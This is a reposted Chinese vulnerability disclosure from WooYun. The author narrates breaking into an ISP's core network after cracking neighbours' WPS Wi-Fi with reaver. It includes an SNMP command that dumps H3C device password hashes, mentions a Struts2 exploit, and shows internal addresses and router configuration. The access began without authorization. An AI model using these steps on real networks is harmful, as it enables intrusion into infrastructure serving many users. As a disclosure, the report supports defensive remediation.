发新话题
打印

从蹭网到爱普宽带核心系统沦陷

从蹭网到爱普宽带核心系统沦陷

漏洞概要
缺陷编号:        WooYun-2014-55272
漏洞标题:        从蹭网到爱普宽带核心系统沦陷
相关厂商:        艾普宽带
漏洞作者:        biangbiang面
提交时间:        2014-04-02 02:37
公开时间:        2014-05-17 02:38
漏洞类型:        命令执行
危害等级:        高
自评Rank:        20
漏洞状态:        厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:        无

漏洞详情披露状态:
2014-04-02:        细节已通知厂商并且等待厂商处理中
2014-04-02:        厂商已经确认,细节仅向厂商公开
2014-04-12:        细节向核心白帽子及相关领域专家公开
2014-04-22:        细节向普通白帽子公开
2014-05-02:        细节向实习白帽子公开
2014-05-17:        细节向公众公开

简要描述:搬家暂时没拉网,于是用reaver破解有wps的无线AP密码蹭网用。
出去吃碗面的功夫,破解了十几个了,其中有一台连上去发现路由获取到的IP是内网的,便有了下文。。。

详细说明:好奇心的驱使^_^

1.判断是什么运营商


code 区域security:~$ nslookup www.baidu.com
Server:                172.18.0.6
Address:        172.18.0.6#53

Non-authoritative answer:
www.baidu.com        canonical name = www.a.shifen.com.
Name:        www.a.shifen.com
Address: 58.217.200.15
Name:        www.a.shifen.com
Address: 58.217.200.13

security:~$ host 172.18.0.6
6.0.18.172.in-addr.arpa domain name pointer aipu-dns01.ip66.com.

经过简单的判断,发现是艾普宽带(成都地区)



2.尝试拿到DNS和出口网关的权限

a.直接扫描DNS所在网段,竟然发现可以访问到很多端口,猜测可能是vlan没有完全隔离。其中便发现一台H3C:


code 区域172.18.0.113   161/udp open        SNMP H3C Comware Platform Software, Software Version 5.20 Release 2208H3C S5500-28F-EI-DCopyright (c) 2004-2011 Hangzhou H3C Tech. Co., Ltd. All rights reserved.



b.试一下snmp漏洞:


code 区域security:~$ snmpwalk -c public -v 1 172.18.0.113 1.3.6.1.4.1.25506.2.12.1.1.1

得到密码hash,破解之。



c.telnet不能连接?登陆到web看看,发现限定了登陆ip的范围:





最初的打算是telnet登陆上去,做个GRE通道,这样在一个C段下,就可以更准确地探测端口开放情况。

PS:本来可以在web端手动添加规则,但为了保证不改动任何机器原本信息的前提下,不做修改。



d.既然锁定了IP范围,就尝试获取到可以进入172.18.0.113的C段机器试试:


code 区域172.18.0.90   8888/http open       struts2 vuln found

扫描到一台struts,看一下:





system权限的xp,发现是个运维的机子,而且此人管理了大量的系统:





其中就有出口IP(172.18.0.1),用之前破解的H3C的帐号密码登陆,有几组是通用的:


code 区域C720_10G_A#show running
Building configuration...

Current configuration : 130718 bytes
!
! Last configuration change at 17:30:40 BeiJing Thu Mar 27 2014 by yujing
! NVRAM config last updated at 07:05:22 BeiJing Thu Mar 20 2014 by jianqingma

如果被不法分子获取,危害还是蛮大的,注意这几行:


code 区域interface Vlan106
description wangjian_guanli_ip
ip address 192.168.204.1 255.255.255.0
!
interface Vlan110
description gonganju_3148guanli
ip address 192.168.110.110 255.255.255.252

有将近4000行的配置,涉及多个vlan、Radius、迅雷、电信、网通、移动等等业务。可以端口镜像,监控成都区域的任何一个艾普网的口子。



看一下cacti的网络流量监测图:







e.最后通过mac地址对比发现,

网关:172.18.0.1

DNS:172.18.0.6,172.18.0.66

这三台是同一台


code 区域172.18.0.1            00-1f-c9-91-38-00     dynamic
172.18.0.6            00-1f-c9-91-38-00     dynamic
172.18.0.66           00-1f-c9-91-38-00     dynamic

至此,整个成都地区的DNS和出口设备已经完全沦陷。同时有通往广东、重庆等地艾普网络的路由,继续测试的话,其他几个地区也要遭殃!



f.另外一个运维,也是可以控制上百台的系统,这两个运维的任务量够大的啊!!!







g.另外,内网的漏洞实在太多了,实在没有时间仔细帮你们做检查了,建议看修复方案。如果有任何疑问,我抽得出时间还是乐意帮忙。


漏洞证明:




修复方案:1.做好vlan隔离,和端口隔离(白名单),Radius用户和其他业务线的网络划分清楚,以防止不法分子破坏

2.内网的漏洞还是比较多,web、系统漏洞、默认密码、空口令等等等等,建议内部安全人员系统性地做一下测试吧

版权声明:转载请注明来源 biangbiang面@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-04-02 14:46
厂商回复:感谢
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2010-055272

TOP

发新话题